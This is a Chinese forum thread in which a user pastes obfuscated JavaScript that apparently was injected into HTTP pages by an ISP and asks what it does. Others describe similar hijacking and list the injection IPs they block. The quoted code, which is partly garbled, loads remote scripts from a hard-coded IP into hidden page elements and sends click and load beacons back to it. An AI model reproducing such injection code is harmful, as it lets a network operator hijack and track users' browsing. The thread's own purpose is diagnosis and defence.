这段 JS 劫持代码什么意思?

2017-12-19 14:25:57 +08:00
 cytlz
var _$ = ['DIV20170608', "document", "getElementsByTagName", 'div', "length", "push", "clientWidth", "clientHeight", "createElement", 'script', "src", 'http://121.31.40.177:88/x.js?id=', '&s=', 'x', "id", "style", "display", 'none', "dataset", "isReplace", "appendChild", "overflow", 'hidden', "onload", "bind", 'Y', "innerHTML", '', 'block', "width", 'px', "height", "activeElement", "parentElement", "getAttribute", 'id', "indexOf", 'http://121.31.40.177:88/s.do?id=h00000003&click', "offsetWidth", "offsetHeight", "parentNode", "isPush", "addEventListener", 'load', 'http://121.31.40.177:88/s.do?id=h00000003&loadNum=']; !
function() {
var a = [];
var b = 0x3;
var c = _$[0];
var d = 0x0;
var e = {};
var f = false;
var g = 0x0;
function loadAd() {
var k = [0x78, 0x7d, 0xa0, 0xb4, 0xc8, 0xea, 0xfa, 0x12c, 0x150, 0x168, 0x1d4, 0x1e0, 0x1f4, 0x244, 0x280, 0x2d8, 0x2f8, 0x3c0];
var l = [0x3c, 0x7d, 0x258, 0x96, 0xc8, 0x3c, 0xfa, 0xfa, 0x118, 0x96, 0x3c, 0xa0, 0xc8, 0x5a, 0x3c, 0x5a, 0x3c, 0x3c];
var m = window[_$[1]][_$[2]](_$[3]);
for (var n = 0x0; n - 0x1) {
r = !0x0; (new Image)[_$[10]] = _$[37];
clearTimeout(q)
};
if (!r) {
q = setTimeout(function() {
checkClick(o)
},
0x32)
}
};
function findEle(o, p) {
p = p || 0x3;
if (!o) {
return false
};
for (var q = 0x0; q
4221 次点击
所在节点    宽带症候群
12 条回复
cytlz
2017-12-19 14:28:22 +08:00
121 点 31 点 40 点 177:88/l.js
cytlz
2017-12-19 14:29:14 +08:00
求 JS 注释,这段代码是干什么的?
wxsm
2017-12-19 21:23:54 +08:00
弹广告用的
lukunlin
2017-12-20 17:20:54 +08:00
不过就是加密后的代码而已,加密也没什么难的,先是用 window.getElementByTagName('div')
然后创建一个 image 对象,就加载广告图片呗。
neowin
2017-12-23 07:33:53 +08:00
是访问新浪科技、新浪财经时出现的么?
cytlz
2017-12-23 12:39:28 +08:00
@neowin
开机联网上的第一个 http 协议的网站就弹。以后就不弹了,只要换 IP 就再弹一下。
我发的那个 IP 已经不弹了,昨天换了另一个 60 点 12 点 123 点 157:88/l.js
今天早上 157 打不开了,换成 250 了.我看他还换什么 IP
cytlz
2017-12-23 15:51:57 +08:00
@neowin 应该是第一个 http 协议,但后缀必须为 html 的站点才执行那个脚本,浏览器状态栏就显示了一下那个 IP 地址被加载了。但并没有任何广告弹出来。同目录下还有个 i.js ,看样子好象是劫持京东的代码
cytlz
2017-12-23 15:52:43 +08:00
@lukunlin 并没有广告弹出来,页面上也没有加任何广告。
cytlz
2017-12-23 15:53:07 +08:00
@wxsm 没有广告弹出来
cytlz
2017-12-23 15:53:35 +08:00
执行的参数是 l.js?_veri=20121009
neowin
2017-12-24 09:25:28 +08:00
@cytlz 和你的遭遇完全相同。我这京东被支持到广告联盟……然后新浪财经和科技,打开任何其下的新闻页面,状态栏就会有 60.12.123.157 ;121.31.40.177 ,页面要等好几秒才打开,正常都是秒开。我只能在防火墙里 ban 掉这两个 IP,这两天还算正常。话说,这事说到底,就是联通干的?!
cytlz
2017-12-24 14:10:20 +08:00
@neowin 今天换成 42.236.73.204:84 了,代码也变了。a.js c.js s.js k.js.我都给加到 ADB 里过滤了,现在只能发现一个过滤一个。他这东西也不弹窗口。不知道做什么的,烦的很,只要是 html 的后缀他就往里插 JS,然后就卡个好秒才能正常打开页面。但是他这东西只要加载过一次,今天就不加载了,除非你断开网络换 IP 他才重新加载。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/415984

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX